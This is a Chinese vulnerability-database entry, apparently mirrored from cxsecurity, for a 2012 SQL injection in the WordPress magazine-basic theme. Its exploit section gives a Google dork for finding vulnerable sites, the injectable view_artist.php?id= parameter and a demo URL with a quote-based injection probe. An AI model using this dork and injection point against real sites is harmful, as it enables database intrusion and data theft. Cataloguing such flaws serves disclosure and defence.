Wordpress magazine-basic-plugin/ Theme SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046058 漏洞类型
发布时间 2012-11-22 更新时间 2012-11-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110163
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Wordpress magazine-basic-plugin/ Theme SQL Injection   ((|))
# Google Dork: inurl:/magazine-basic/view_artist.php?id=                ((|))
# Exploit Author: Novin hack (khatarnak)                        #
# Category: Web Application                                     #
# Tested on: Windows 7                                          #

#* Location:  http://site.com/wp-content/                       #
#* /themes/magazine-basic/                                      #
#* view_artist.php?id=?[SQLi]                                   #
#* Demo:http://weloZZZZZZZZZZZZZ.com/wordpress/wp-content/themes/  #
#* magazine-basic/view_artist.php/?id=null'                     #